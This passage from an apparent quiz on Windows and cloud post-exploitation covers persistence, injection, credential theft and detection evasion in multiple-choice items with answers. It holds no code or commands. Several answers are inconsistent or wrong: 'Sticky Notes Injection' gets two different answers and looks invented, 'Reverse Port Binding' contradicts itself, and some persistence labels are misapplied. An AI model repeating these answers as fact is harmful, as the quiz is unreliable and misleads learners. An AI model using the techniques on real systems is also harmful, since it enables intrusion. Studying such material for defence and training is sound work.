✅ Answer: A) Automatically execute malicious payloads when specific system events occur
Explanation: WMI Event Subscription sets up triggers to run malicious scripts or binaries whenever a system event occurs.

109. What is “Service Failure Recovery Persistence” in Windows?

A) Configuring a Windows service to restart and execute malicious code on failure
B) Injecting malware into system processes
C) Hijacking SMB sessions
D) Modifying DNS entries

✅ Answer: A) Configuring a Windows service to restart and execute malicious code on failure
Explanation: Attackers configure Windows services to restart and run malicious commands upon failure.

110. How does an attacker use “PowerShell downgrade attacks” in post-exploitation?

A) Bypass security restrictions by forcing PowerShell to run in legacy mode
B) Prevent PowerShell logging
C) Encrypt stolen credentials
D) Modify Windows registry settings

✅ Answer: A) Bypass security restrictions by forcing PowerShell to run in legacy mode
Explanation: PowerShell downgrade attacks force PowerShell to execute scripts in an older, less-secure mode.

111. What persistence mechanism exploits “Group Policy Preferences (GPP)”?

A) Extracting plaintext credentials from Group Policy XML files
B) Injecting malicious JavaScript into GPO rules
C) Using scheduled tasks for executing payloads
D) Modifying Windows bootloader

✅ Answer: A) Extracting plaintext credentials from Group Policy XML files
Explanation: GPP stores credentials in XML files, allowing attackers to extract plaintext passwords.

112. What is the primary function of “Process Hollowing” in post-exploitation?

A) Replacing a legitimate process’s memory with malicious code
B) Creating fake system accounts
C) Conducting brute-force attacks
D) Encrypting all files on the system

✅ Answer: A) Replacing a legitimate process’s memory with malicious code
Explanation: Process Hollowing allows malware to execute inside a trusted process, making it harder to detect.

113. How does “DNS Hijacking” help in maintaining access?

A) Redirecting network traffic to attacker-controlled domains
B) Encrypting all DNS requests
C) Preventing users from accessing the internet
D) Generating fake HTTP headers

✅ Answer: A) Redirecting network traffic to attacker-controlled domains
Explanation: DNS Hijacking modifies DNS settings, allowing attackers to redirect victims to malicious websites.

114. What is a common method attackers use to exfiltrate data while evading detection?

A) DNS Tunneling
B) SQL Injection
C) Cross-Site Scripting
D) ARP Poisoning

✅ Answer: A) DNS Tunneling
Explanation: DNS Tunneling sends data through DNS queries, bypassing network security controls.

115. What is the goal of “Windows Sticky Notes Injection” in post-exploitation?

A) Running malicious commands via sethc.exe
B) Using Windows Sticky Notes as a persistence mechanism
C) Injecting code into notepad.exe
D) Stealing user credentials

✅ Answer: B) Using Windows Sticky Notes as a persistence mechanism
Explanation: Attackers modify Sticky Notes configurations to launch malicious scripts upon execution.

116. What attack abuses “NTFS Alternate Data Streams (ADS)”?

A) Hiding malicious payloads inside legitimate files without changing file size
B) Injecting malware into system logs
C) Manipulating DNS responses
D) Creating fake SSL certificates

✅ Answer: A) Hiding malicious payloads inside legitimate files without changing file size
Explanation: ADS in NTFS allows malware to hide inside legitimate files, remaining undetected.

117. How does “LSASS Dumping” help attackers?

A) Extracts password hashes and Kerberos tickets from memory
B) Hides malicious processes from Task Manager
C) Brute-forces Active Directory accounts
D) Modifies SMB authentication

✅ Answer: A) Extracts password hashes and Kerberos tickets from memory
Explanation: LSASS Dumping retrieves password hashes and Kerberos tickets for further exploitation.

118. What is the primary goal of “Session Hijacking” in post-exploitation?

A) Gaining unauthorized access by stealing an active session token
B) Brute-forcing login credentials
C) Encrypting session cookies
D) Modifying the system’s boot process

✅ Answer: A) Gaining unauthorized access by stealing an active session token
Explanation: Session Hijacking involves stealing authentication tokens to impersonate a legitimate user without needing credentials.

119. How does an attacker use “BitLocker Abuse” for persistence?

A) Encrypting critical system files and demanding ransom
B) Modifying Windows kernel settings
C) Injecting payloads into system processes
D) Modifying user permissions

✅ Answer: A) Encrypting critical system files and demanding ransom
Explanation: Attackers may use BitLocker to encrypt files, locking out legitimate users while maintaining control over the system.

120. What is a key characteristic of “Heap Spraying” in post-exploitation?

A) Filling memory with predictable data to facilitate exploitation
B) Encrypting all stored credentials
C) Bypassing network firewall rules
D) Stealing password hashes

✅ Answer: A) Filling memory with predictable data to facilitate exploitation
Explanation: Heap Spraying is an exploit technique that prepares memory in a predictable way to increase exploit reliability.

121. How does “Hook Injection” work in post-exploitation?

A) Modifying API calls to execute malicious code in targeted processes
B) Creating fake login prompts to steal credentials
C) Modifying firewall rules to allow malicious traffic
D) Hiding malware inside system logs

✅ Answer: A) Modifying API calls to execute malicious code in targeted processes
Explanation: Hook Injection manipulates API function calls to inject and execute malicious code stealthily.

122. What persistence method involves modifying the Windows Boot Configuration Data (BCD)?

A) Bootkit Persistence
B) DLL Injection
C) Token Hijacking
D) Phishing Attack

✅ Answer: A) Bootkit Persistence
Explanation: Bootkits modify the BCD or Master Boot Record (MBR) to load malware before the OS boots.

123. What attack involves intercepting and modifying legitimate API calls?

A) API Hooking
B) DLL Hijacking
C) Pass-the-Hash
D) Lateral Movement

✅ Answer: A) API Hooking
Explanation: API Hooking allows attackers to modify function calls in real-time, injecting or redirecting execution.

124. What is the main goal of “Clipboard Hijacking” in post-exploitation?

A) Monitoring and modifying clipboard data to steal sensitive information
B) Disabling clipboard functionality on remote desktops
C) Extracting network traffic logs
D) Encrypting clipboard contents

✅ Answer: A) Monitoring and modifying clipboard data to steal sensitive information
Explanation: Clipboard Hijacking captures copied passwords, credit card numbers, or cryptocurrency wallet addresses.

125. How does “Reverse Shell Encoding” help evade detection?

A) Obfuscating payloads to bypass antivirus and intrusion detection systems
B) Encrypting shell commands before execution
C) Running exploits inside a virtualized container
D) Modifying system BIOS

✅ Answer: A) Obfuscating payloads to bypass antivirus and intrusion detection systems
Explanation: Reverse Shell Encoding disguises malicious commands, making detection harder.

126. What is “Process Doppelgänging” used for in post-exploitation?

A) Running malicious code within a legitimate process without detection
B) Encrypting all system files
C) Conducting brute-force attacks against user accounts
D) Spoofing DNS requests

✅ Answer: A) Running malicious code within a legitimate process without detection
Explanation: Process Doppelgänging exploits Windows features to execute malware in a legitimate-looking process.

127. How do attackers abuse “Remote Desktop Protocol (RDP) Shadowing” for persistence?

A) Hijacking active RDP sessions without the user noticing
B) Scanning for open RDP ports on the network
C) Disabling multi-factor authentication on RDP servers
D) Bypassing firewall restrictions

✅ Answer: A) Hijacking active RDP sessions without the user noticing
Explanation: RDP Shadowing allows attackers to view and control an active session without alerting the user.

128. What is a key characteristic of “Timestomping” in post-exploitation?

A) Modifying file timestamps to evade forensic detection
B) Injecting payloads into Windows time synchronization services
C) Exploiting time-based authentication tokens
D) Manipulating system logs

✅ Answer: A) Modifying file timestamps to evade forensic detection
Explanation: Timestomping alters creation, modification, and access timestamps to make malware appear old and avoid detection.

129. What is “Signed Binary Proxy Execution” used for?

A) Running malicious payloads using trusted Microsoft-signed binaries
B) Encrypting sensitive user credentials
C) Modifying Windows Boot Loaders
D) Conducting phishing attacks

✅ Answer: A) Running malicious payloads using trusted Microsoft-signed binaries
Explanation: Signed Binary Proxy Execution abuses trusted Windows executables (e.g., mshta.exe, regsvr32.exe) to execute malware.

130. How does an attacker abuse “Scheduled Task Hijacking” for persistence?

A) Modifying existing scheduled tasks to execute malicious scripts
B) Encrypting scheduled task logs
C) Modifying BIOS settings
D) Disabling antivirus software

✅ Answer: A) Modifying existing scheduled tasks to execute malicious scripts
Explanation: Scheduled Task Hijacking allows attackers to alter legitimate task configurations for persistence.

131. What does “Kernel Mode Rootkit” do in post-exploitation?

A) Hides malicious activity by running in the OS kernel
B) Encrypts user files for ransom
C) Injects JavaScript into webpages
D) Conducts SQL Injection attacks

✅ Answer: A) Hides malicious activity by running in the OS kernel
Explanation: Kernel Mode Rootkits provide stealthy persistence by modifying OS-level processes.

132. How do attackers use “LDAP Enumeration” in post-exploitation?

A) Gather user and group information from Active Directory
B) Inject malicious payloads into database queries
C) Modify registry keys to disable authentication logs
D) Conduct brute-force attacks against user passwords

✅ Answer: A) Gather user and group information from Active Directory
Explanation: LDAP Enumeration provides valuable intelligence on users, groups, and permissions within a Windows domain.

133. What is the primary goal of “Token Impersonation” in post-exploitation?

A) Gaining higher privileges by using a stolen authentication token
B) Injecting malicious JavaScript into a web application
C) Encrypting system logs to evade detection
D) Modifying Active Directory group policies

✅ Answer: A) Gaining higher privileges by using a stolen authentication token
Explanation: Token Impersonation allows an attacker to use a stolen security token to execute commands as a higher-privilege user.

134. How does an attacker use “Winlogon Helper DLL Injection” for persistence?

A) Injecting malicious DLLs into the Winlogon.exe process to maintain access
B) Modifying login credentials stored in the registry
C) Exploiting a buffer overflow in Windows login services
D) Encrypting user authentication logs

✅ Answer: A) Injecting malicious DLLs into the Winlogon.exe process to maintain access
Explanation: Attackers inject malicious DLLs into Winlogon.exe, ensuring execution every time a user logs in.

135. What is the main purpose of “System Binary Proxy Execution”?

A) Using trusted system binaries to execute malicious code
B) Modifying system log timestamps to hide activity
C) Injecting shellcode into user-mode applications
D) Exploiting kernel vulnerabilities for privilege escalation

✅ Answer: A) Using trusted system binaries to execute malicious code
Explanation: System Binary Proxy Execution abuses trusted Windows binaries (e.g., mshta.exe, regsvr32.exe) to execute malware.

136. What is the purpose of “Web Cache Poisoning” in post-exploitation?

A) Injecting malicious content into cached web responses to target users
B) Hiding malware inside encrypted SSL sessions
C) Bypassing security measures by modifying DNS settings
D) Disabling Content Security Policy (CSP)

✅ Answer: A) Injecting malicious content into cached web responses to target users
Explanation: Web Cache Poisoning manipulates cached web content, allowing attackers to serve malicious responses to victims.

137. How does “AppInit DLL Injection” help an attacker maintain persistence?

A) Loading a malicious DLL into every user-mode process that uses user32.dll
B) Exploiting API misconfigurations to escalate privileges
C) Injecting shellcode into browser processes
D) Manipulating Windows boot sequence

✅ Answer: A) Loading a malicious DLL into every user-mode process that uses user32.dll
Explanation: AppInit DLL Injection ensures malicious DLLs load into every process using user32.dll, maintaining persistence.

138. What is the purpose of “Reverse Port Forwarding” in post-exploitation?

A) Establishing access from the victim’s internal network back to the attacker’s machine
B) Modifying remote firewall configurations
C) Encrypting communication between an attacker and the victim
D) Spoofing ARP requests to intercept network traffic

✅ Answer: A) Establishing access from the victim’s internal network back to the attacker’s machine
Explanation: Reverse Port Forwarding allows an attacker to bypass NAT/firewall restrictions and maintain remote access.

139. How do attackers use “LOLBins” (Living Off the Land Binaries) for post-exploitation?

A) Executing malicious payloads using trusted system binaries
B) Modifying Active Directory group policies
C) Conducting brute-force attacks against user passwords
D) Injecting exploits into kernel-mode drivers

✅ Answer: A) Executing malicious payloads using trusted system binaries
Explanation: LOLBins (e.g., certutil.exe, mshta.exe, rundll32.exe) are trusted binaries used for malicious execution.

140. How does “Ghosting” help attackers evade detection?

A) Creating a file that appears deleted but is still accessible
B) Masking a malicious process as a legitimate one
C) Modifying the BIOS to execute malware before the OS loads
D) Running payloads in a sandbox environment

✅ Answer: A) Creating a file that appears deleted but is still accessible
Explanation: Ghosting allows an attacker to create files that appear deleted but remain accessible, bypassing forensic tools.

141. What is the purpose of “UAC Bypass” in post-exploitation?

A) Running malware with administrative privileges without triggering User Account Control prompts
B) Injecting malicious scripts into Windows event logs
C) Modifying DNS settings to redirect user traffic
D) Exploiting buffer overflows in Windows security policies

✅ Answer: A) Running malware with administrative privileges without triggering User Account Control prompts
Explanation: UAC Bypass exploits whitelisted executables to elevate privileges without user interaction.

142. How does “Process Hollowing” help attackers evade detection?

A) Injecting malicious code into a legitimate process, replacing its memory space
B) Executing PowerShell commands without logging
C) Spoofing IP addresses in network traffic
D) Encrypting all user data before exfiltration

✅ Answer: A) Injecting malicious code into a legitimate process, replacing its memory space
Explanation: Process Hollowing allows malware to execute under a trusted process name, evading detection.

143. What is “ASR Bypass” in Windows security evasion?

A) Disabling Attack Surface Reduction (ASR) rules to allow malicious execution
B) Exploiting SQL vulnerabilities to extract data
C) Injecting exploits into Bluetooth devices
D) Modifying Active Directory policies

✅ Answer: A) Disabling Attack Surface Reduction (ASR) rules to allow malicious execution
Explanation: ASR Bypass allows attackers to disable Microsoft’s Attack Surface Reduction rules, reducing security controls.

144. How do attackers use “VBA Stomping” in malware delivery?

A) Embedding malicious macros in Microsoft Office documents without detection
B) Modifying the Windows registry to execute malware
C) Spoofing legitimate email addresses for phishing attacks
D) Brute-forcing administrator passwords

✅ Answer: A) Embedding malicious macros in Microsoft Office documents without detection
Explanation: VBA Stomping hides malicious macros in Office documents, avoiding signature-based detection.

145. What is the purpose of “Password Spraying” in post-exploitation?

A) Attempting a few commonly used passwords across many accounts to avoid detection
B) Brute-forcing a single account with multiple password attempts
C) Encrypting user passwords in Active Directory
D) Injecting JavaScript into login pages

✅ Answer: A) Attempting a few commonly used passwords across many accounts to avoid detection
Explanation: Password Spraying avoids account lockouts by testing weak passwords against multiple users.

146. How does “TrustedInstaller Abuse” allow attackers to gain persistence?

A) Running code with system-level privileges by hijacking TrustedInstaller.exe
B) Encrypting user files before exfiltration
C) Modifying Active Directory schema for unauthorized access
D) Conducting privilege escalation via browser vulnerabilities

✅ Answer: A) Running code with system-level privileges by hijacking TrustedInstaller.exe
Explanation: TrustedInstaller Abuse allows attackers to execute malware with SYSTEM privileges, bypassing standard restrictions.

147. What is the purpose of “Remote Thread Injection” in post-exploitation?

A) Injecting malicious code into another process’s memory space
B) Running a brute-force attack on a remote server
C) Hijacking a user’s network session
D) Encrypting all system logs

✅ Answer: A) Injecting malicious code into another process’s memory space
Explanation: Remote Thread Injection creates a new thread inside a legitimate process to execute malicious payloads stealthily.

148. How does “Hollow Process Injection” help attackers evade detection?

A) Replacing the memory of a legitimate process with malicious code
B) Encrypting stolen credentials before exfiltration
C) Modifying registry keys to disable logging
D) Using social engineering to trick users

✅ Answer: A) Replacing the memory of a legitimate process with malicious code
Explanation: Hollow Process Injection launches a trusted process but replaces its memory with malicious payloads, making detection harder.

149. What is “Phantom DLL Hijacking” used for in post-exploitation?

A) Loading malicious DLLs when the system searches for non-existent ones
B) Injecting JavaScript into browser sessions
C) Exploiting an SQL database misconfiguration
D) Spoofing MAC addresses for anonymity

✅ Answer: A) Loading malicious DLLs when the system searches for non-existent ones
Explanation: Phantom DLL Hijacking exploits applications that try to load missing DLLs, allowing attackers to place malicious DLLs in expected locations.

150. How does “AutoRun Persistence” help attackers maintain access?

A) Placing malicious scripts in Windows startup locations
B) Bypassing multifactor authentication
C) Encrypting payloads to avoid detection
D) Using DNS tunneling for data exfiltration

✅ Answer: A) Placing malicious scripts in Windows startup locations
Explanation: AutoRun Persistence ensures that malicious payloads execute at every system startup, keeping access active.

151. What is the primary function of “COM Hijacking” in persistence?

A) Modifying Windows Component Object Model (COM) registry keys to execute malware
B) Encrypting critical system files to demand ransom
C) Running brute-force attacks against domain accounts
D) Modifying BIOS firmware

✅ Answer: A) Modifying Windows Component Object Model (COM) registry keys to execute malware
Explanation: COM Hijacking exploits Windows COM objects, replacing them with malicious entries to maintain persistence.

152. How does an attacker use “WMI Backdoor” for persistence?

A) Using Windows Management Instrumentation (WMI) to execute commands stealthily
B) Injecting malware into the BIOS
C) Running exploits through an SQL database
D) Encrypting Windows event logs

✅ Answer: A) Using Windows Management Instrumentation (WMI) to execute commands stealthily
Explanation: WMI Backdoors use event triggers to execute malicious commands on target systems without requiring a file.

153. What is the advantage of using “Process Injection” over traditional malware execution?

A) Runs malicious code within legitimate processes, avoiding detection
B) Requires less system memory
C) Provides faster network access
D) Encrypts all system processes

✅ Answer: A) Runs malicious code within legitimate processes, avoiding detection
Explanation: Process Injection hides malware execution inside legitimate processes, making it harder to detect.

154. How does “Kernel Callback Injection” help attackers bypass security mechanisms?

A) Manipulating kernel callbacks to execute malicious code in kernel mode
B) Spoofing network traffic logs
C) Encrypting system files for ransom
D) Running brute-force attacks

✅ Answer: A) Manipulating kernel callbacks to execute malicious code in kernel mode
Explanation: Kernel Callback Injection abuses Windows kernel callbacks, giving attackers high-privilege execution.

155. What is the primary purpose of “APC Injection” in post-exploitation?

A) Queueing malicious code for execution within a running thread
B) Encrypting user credentials before exfiltration
C) Running a phishing attack against system admins
D) Injecting malware into BIOS firmware

✅ Answer: A) Queueing malicious code for execution within a running thread
Explanation: Asynchronous Procedure Call (APC) Injection schedules malicious execution within existing threads, reducing detection.

156. What is the role of “Fileless Malware” in evading security solutions?

A) Executes entirely in memory without writing files to disk
B) Disguises itself as a system driver
C) Injects payloads into the boot sector
D) Uses brute-force attacks to gain access

✅ Answer: A) Executes entirely in memory without writing files to disk
Explanation: Fileless Malware operates in memory, avoiding traditional antivirus file scans.

157. How does “Kerberos Ticket Granting Ticket (TGT) Theft” benefit attackers?

A) Grants long-term access to Active Directory without requiring reauthentication
B) Encrypts all system logs to avoid detection
C) Modifies firewall rules to allow persistent access
D) Runs brute-force attacks against domain controllers

✅ Answer: A) Grants long-term access to Active Directory without requiring reauthentication
Explanation: Stealing a Kerberos TGT allows attackers to continue accessing resources without re-entering credentials.

158. What persistence technique involves modifying “Image File Execution Options (IFEO)”?

A) Replacing default debugger paths to execute malicious payloads
B) Encrypting Windows system files
C) Running exploits against Active Directory
D) Injecting payloads into PowerShell scripts

✅ Answer: A) Replacing default debugger paths to execute malicious payloads
Explanation: IFEO Hijacking modifies debugger paths in the registry, making Windows execute malware instead of legitimate applications.

159. How does “Password Filter DLL Injection” help attackers?

A) Capturing plaintext passwords during system authentication
B) Disabling security features in Windows Defender
C) Encrypting exfiltrated credentials
D) Running ransomware payloads

✅ Answer: A) Capturing plaintext passwords during system authentication
Explanation: Password Filter DLL Injection allows attackers to hook into Windows authentication processes and steal passwords.

160. What is the primary goal of “NTFS Extended Attributes Abuse” in post-exploitation?

A) Hiding malware within NTFS file attributes without altering file size
B) Encrypting Windows event logs
C) Modifying firewall rules to maintain persistence
D) Spoofing system calls to evade detection

✅ Answer: A) Hiding malware within NTFS file attributes without altering file size
Explanation: NTFS Extended Attributes Abuse lets attackers hide payloads inside file metadata, making them invisible in regular directory listings.

161. What is the primary goal of “Security Descriptor Modification” in post-exploitation?

A) Changing access control permissions to maintain unauthorized access
B) Injecting malware into security logs
C) Modifying BIOS firmware for persistence
D) Running brute-force attacks against Windows Defender

✅ Answer: A) Changing access control permissions to maintain unauthorized access
Explanation: Security Descriptor Modification allows attackers to alter permissions on files, registry keys, or services to maintain control.

162. How does “SID-History Injection” help attackers maintain access?

A) Adding stolen security identifiers to an account to gain elevated privileges
B) Injecting malware into kernel processes
C) Encrypting all Active Directory credentials
D) Running brute-force attacks on SSH servers

✅ Answer: A) Adding stolen security identifiers to an account to gain elevated privileges
Explanation: SID-History Injection allows attackers to add a previously privileged SID to their account, bypassing authentication checks.

163. What is “Hidden Scheduled Task Persistence” in Windows?

A) Creating a scheduled task that does not appear in normal task listings
B) Encrypting user login credentials for later use
C) Spoofing network traffic to hide from monitoring tools
D) Exploiting PowerShell vulnerabilities to execute remote code

✅ Answer: A) Creating a scheduled task that does not appear in normal task listings
Explanation: Hidden Scheduled Tasks are crafted to remain invisible to standard administrative tools, ensuring persistence.

164. What attack method exploits “Group Managed Service Accounts (gMSA)” for persistence?

A) Extracting cached credentials for later use
B) Brute-forcing service account passwords
C) Injecting malware into Active Directory logs
D) Using PowerShell to disable security policies

✅ Answer: A) Extracting cached credentials for later use
Explanation: gMSA credentials are often cached, allowing attackers to extract them and authenticate without detection.

165. What is “Remote COM Object Hijacking” used for in post-exploitation?

A) Executing malicious commands through COM objects on remote systems
B) Modifying Windows registry keys to disable authentication logs
C) Injecting payloads into browser processes
D) Encrypting files before exfiltration

✅ Answer: A) Executing malicious commands through COM objects on remote systems
Explanation: Remote COM Object Hijacking allows attackers to remotely execute payloads via Windows COM objects.

166. How does “Application Shimming” help attackers evade detection?

A) Modifying Windows Application Compatibility settings to load malicious code
B) Encrypting stolen data before exfiltration
C) Injecting payloads into system processes
D) Running ransomware payloads on boot

✅ Answer: A) Modifying Windows Application Compatibility settings to load malicious code
Explanation: Application Shimming abuses Microsoft’s Application Compatibility features to execute malware stealthily.

167. What is the purpose of “Process Ghosting” in post-exploitation?

A) Executing malicious processes that never appear in forensic analysis
B) Injecting JavaScript into session cookies
C) Modifying SMB settings to allow anonymous access
D) Running exploits on outdated TLS protocols

✅ Answer: A) Executing malicious processes that never appear in forensic analysis
Explanation: Process Ghosting allows malware to execute without being seen in process monitoring tools.

168. How does “PowerShell Constrained Language Mode Bypass” help attackers?

A) Disabling PowerShell security restrictions to execute unrestricted commands
B) Running a phishing attack against system administrators
C) Spoofing system update messages to trick users
D) Modifying the BIOS firmware to execute malware at boot

✅ Answer: A) Disabling PowerShell security restrictions to execute unrestricted commands
Explanation: PowerShell Constrained Language Mode Bypass allows attackers to override security controls that prevent script execution.

169. What is “Custom Protocol Handler Exploitation” used for?

A) Executing malicious code by abusing registered protocol handlers in Windows
B) Spoofing DNS responses to redirect users to fake login pages
C) Disabling Windows Defender via registry modifications
D) Injecting payloads into SQL databases

✅ Answer: A) Executing malicious code by abusing registered protocol handlers in Windows
Explanation: Custom Protocol Handler Exploitation leverages misconfigured URL handlers to execute commands on the victim’s machine.

170. How does “Netlogon Elevation of Privilege Exploit” help attackers?

A) Gaining domain admin access by exploiting authentication flaws in Netlogon
B) Injecting shellcode into Active Directory logs
C) Brute-forcing Kerberos tickets
D) Spoofing domain administrator credentials

✅ Answer: A) Gaining domain admin access by exploiting authentication flaws in Netlogon
Explanation: The Netlogon Elevation of Privilege exploit (e.g., CVE-2020-1472, Zerologon) allows attackers to impersonate domain administrators.

171. What is the purpose of “Kernel Object Hooking” in post-exploitation?

A) Modifying kernel structures to hide malicious activity
B) Exploiting buffer overflow vulnerabilities
C) Encrypting all stored credentials before exfiltration
D) Running brute-force attacks on VPN connections

✅ Answer: A) Modifying kernel structures to hide malicious activity
Explanation: Kernel Object Hooking alters kernel-level structures to mask malware and prevent detection.

172. How does “User Mode Rootkit” differ from a Kernel Mode Rootkit?

A) It operates within standard user processes instead of kernel space
B) It only targets mobile devices
C) It modifies BIOS firmware instead of user files
D) It encrypts all network communications

✅ Answer: A) It operates within standard user processes instead of kernel space
Explanation: User Mode Rootkits function within user applications, making them easier to deploy but less stealthy than Kernel Mode Rootkits.

173. What is the purpose of “NTLM Hash Injection” in post-exploitation?

A) Authenticating as a legitimate user without knowing their password
B) Spoofing email addresses for phishing attacks
C) Encrypting NTFS partitions to prevent access
D) Modifying SMB configurations to allow anonymous access

✅ Answer: A) Authenticating as a legitimate user without knowing their password
Explanation: NTLM Hash Injection allows attackers to use stolen hashes to authenticate without cracking passwords.

174. How do attackers use “SMB Named Pipe Impersonation” for privilege escalation?

A) Creating rogue named pipes to intercept high-privilege processes
B) Brute-forcing NTLM hashes to gain system access
C) Injecting payloads into SMB file shares
D) Modifying DNS entries for redirection

✅ Answer: A) Creating rogue named pipes to intercept high-privilege processes
Explanation: SMB Named Pipe Impersonation tricks Windows into treating the attacker’s malicious pipe as a legitimate system pipe.

175. What persistence method uses “Active Setup Registry Keys” in Windows?

A) Running malware every time a new user logs in
B) Encrypting PowerShell logs to avoid detection
C) Running scheduled tasks under SYSTEM privileges
D) Spoofing VPN connections

✅ Answer: A) Running malware every time a new user logs in
Explanation: Active Setup Registry Keys execute specified commands each time a new user profile is created.

176. What is the purpose of “Windows Sticky Notes Injection” in persistence?

A) Embedding malicious payloads into Sticky Notes for execution
B) Injecting malware into Windows boot sectors
C) Modifying BIOS firmware to execute malware before the OS loads
D) Encrypting user credentials before exfiltration

✅ Answer: A) Embedding malicious payloads into Sticky Notes for execution
Explanation: Sticky Notes Injection allows attackers to embed scripts or payloads within Sticky Notes, ensuring execution upon system startup.

177. How does “Sysmon Evasion” help attackers maintain stealth in post-exploitation?

A) Disabling or bypassing Microsoft Sysmon logs to avoid detection
B) Encrypting malware binaries to bypass antivirus
C) Manipulating event log timestamps to prevent forensic analysis
D) Injecting shellcode into legitimate processes

✅ Answer: A) Disabling or bypassing Microsoft Sysmon logs to avoid detection
Explanation: Sysmon Evasion techniques involve disabling logging, modifying rules, or clearing logs to prevent security monitoring.

178. What is “Rootkit Hypervisor Injection” used for in post-exploitation?

A) Running a malicious hypervisor beneath the OS to control system execution
B) Encrypting all files in a hidden partition
C) Extracting passwords from memory using direct kernel access
D) Brute-forcing NTLM authentication tokens

✅ Answer: A) Running a malicious hypervisor beneath the OS to control system execution
Explanation: Rootkit Hypervisor Injection allows attackers to install a malicious hypervisor below the OS, intercepting all operations undetected.

179. How do attackers use “Windows Services Hijacking” for persistence?

A) Modifying legitimate services to execute malicious payloads on startup
B) Overwriting system binaries with malicious code
C) Disabling Windows Defender using registry modifications
D) Spoofing user accounts to gain higher privileges

✅ Answer: A) Modifying legitimate services to execute malicious payloads on startup
Explanation: Windows Services Hijacking involves modifying existing system services to execute attacker-controlled payloads upon system restart.

180. What is “Kerberos Ticket Injection” in post-exploitation?

A) Injecting forged Kerberos tickets to bypass authentication
B) Manipulating Active Directory logs to erase attack traces
C) Extracting password hashes from NTDS.dit
D) Spoofing DNS requests for network redirection

✅ Answer: A) Injecting forged Kerberos tickets to bypass authentication
Explanation: Kerberos Ticket Injection allows attackers to generate and inject forged TGT or TGS tickets to impersonate domain users.

181. What is the purpose of “EtwTi ByPass” in evading detection?

A) Disabling Event Tracing for Windows (ETW) and Threat Intelligence (Ti) logging
B) Encrypting all system logs before exfiltration
C) Using alternate authentication methods to bypass security policies
D) Running brute-force attacks against Kerberos authentication

✅ Answer: A) Disabling Event Tracing for Windows (ETW) and Threat Intelligence (Ti) logging
Explanation: EtwTi Bypass prevents Windows Defender and security tools from detecting malicious activity by disabling telemetry logging.

182. How does “Named Pipe Impersonation” help attackers escalate privileges?

A) Creating malicious named pipes that intercept system processes
B) Encrypting network traffic to hide communication
C) Injecting shellcode into Active Directory services
D) Modifying NTFS permissions to allow remote execution

✅ Answer: A) Creating malicious named pipes that intercept system processes
Explanation: Named Pipe Impersonation allows attackers to intercept privileged processes and escalate privileges.

183. What is “Indirect Syscall Execution” in post-exploitation?

A) Executing system calls without direct interaction to evade security hooks
B) Spoofing authentication tokens to bypass MFA
C) Injecting shellcode into PowerShell scripts
D) Brute-forcing NTLM authentication

✅ Answer: A) Executing system calls without direct interaction to evade security hooks
Explanation: Indirect Syscall Execution allows malware to bypass security monitoring tools by avoiding direct API calls.

184. What is the primary use of “OAuth Token Theft” in post-exploitation?

A) Gaining unauthorized access to cloud services using stolen OAuth tokens
B) Injecting malicious code into email services
C) Running privilege escalation exploits on VPN connections
D) Manipulating authentication logs to prevent detection

✅ Answer: A) Gaining unauthorized access to cloud services using stolen OAuth tokens
Explanation: OAuth Token Theft allows attackers to access cloud-based accounts and applications without requiring passwords.

185. How does “Memory Module Stomping” help attackers evade detection?

A) Overwriting the memory of legitimate modules with malicious code
B) Encrypting files before exfiltration
C) Bypassing multifactor authentication on Windows systems
D) Modifying BIOS firmware to execute malware at startup

✅ Answer: A) Overwriting the memory of legitimate modules with malicious code
Explanation: Memory Module Stomping ensures that malicious code executes within trusted processes, bypassing security scans.

186. What is the goal of “Reverse Port Binding” in post-exploitation?

A) Establishing a remote connection by binding a service to a local port
B) Encrypting exfiltrated data before sending it to an attacker
C) Modifying Windows Defender exclusions via registry changes
D) Injecting JavaScript into active web sessions

✅ Answer: A) Establishing a remote connection by binding a service to a local port
Explanation: Reverse Port Binding allows attackers to open local ports that listen for attacker connections, bypassing outbound firewalls.

187. How does “Active Directory Shadow Credentials Exploitation” allow persistence?

A) Creating a rogue authentication certificate to impersonate users
B) Overwriting password hashes in NTDS.dit
C) Spoofing domain administrator logins using stolen hashes
D) Encrypting authentication logs to evade detection

✅ Answer: A) Creating a rogue authentication certificate to impersonate users
Explanation: Shadow Credentials Exploitation enables attackers to register unauthorized authentication certificates for domain persistence.

188. What is the purpose of “Office Add-in Persistence” in post-exploitation?

A) Embedding malicious VBA code into Office add-ins for automatic execution
B) Modifying Windows registry keys to disable logging
C) Encrypting stored credentials before exfiltration
D) Running brute-force attacks on Outlook accounts

✅ Answer: A) Embedding malicious VBA code into Office add-ins for automatic execution
Explanation: Office Add-in Persistence allows attackers to execute malicious code when users open Office applications.

189. How does “Remote Desktop Credential Hijacking” help attackers?

A) Stealing plaintext RDP session credentials for unauthorized access
B) Injecting malware into Windows Remote Desktop Services
C) Modifying security policies to disable logging
D) Running a ransomware payload through an RDP connection

✅ Answer: A) Stealing plaintext RDP session credentials for unauthorized access
Explanation: RDP Credential Hijacking allows attackers to extract stored credentials from active RDP sessions.

190. What is “Pluggable Authentication Module (PAM) Backdoor” in Linux post-exploitation?

A) Creating a malicious PAM module to allow stealthy authentication
B) Modifying sudo configurations to escalate privileges
C) Injecting shellcode into SSH sessions
D) Encrypting authentication logs before exfiltration

✅ Answer: A) Creating a malicious PAM module to allow stealthy authentication
Explanation: PAM Backdoors enable attackers to authenticate as any user without detection, bypassing normal login restrictions.

191. How does “Cloud Instance Metadata Abuse” help attackers maintain access?

A) Extracting temporary access tokens from cloud instance metadata services
B) Modifying cloud firewall rules to allow persistence
C) Encrypting cloud storage to demand ransom
D) Injecting malicious scripts into cloud-based APIs

✅ Answer: A) Extracting temporary access tokens from cloud instance metadata services
Explanation: Cloud Metadata Abuse allows attackers to extract IAM credentials or temporary session tokens from services like AWS EC2, Azure, or GCP.

192. What is “Local Port Forwarding” used for in post-exploitation?

A) Redirecting network traffic from a local port to a remote system
B) Encrypting stolen credentials before exfiltration
C) Modifying Windows Defender exclusions via registry keys
D) Bypassing two-factor authentication on cloud services

✅ Answer: A) Redirecting network traffic from a local port to a remote system
Explanation: Local Port Forwarding allows attackers to expose internal services externally by forwarding traffic through a compromised host.

193. What is the purpose of “Application Whitelisting Bypass” in post-exploitation?

A) Executing malware by abusing trusted applications that are allowed to run
B) Modifying BIOS firmware to execute malicious payloads
C) Extracting passwords from NTDS.dit on a domain controller
D) Running brute-force attacks on OAuth tokens

✅ Answer: A) Executing malware by abusing trusted applications that are allowed to run
Explanation: Whitelisting Bypass allows attackers to use legitimate system binaries (LOLBins) like mshta.exe, certutil.exe, or rundll32.exe to execute malicious payloads.

194. How do attackers use “SSH Agent Hijacking” to maintain access?

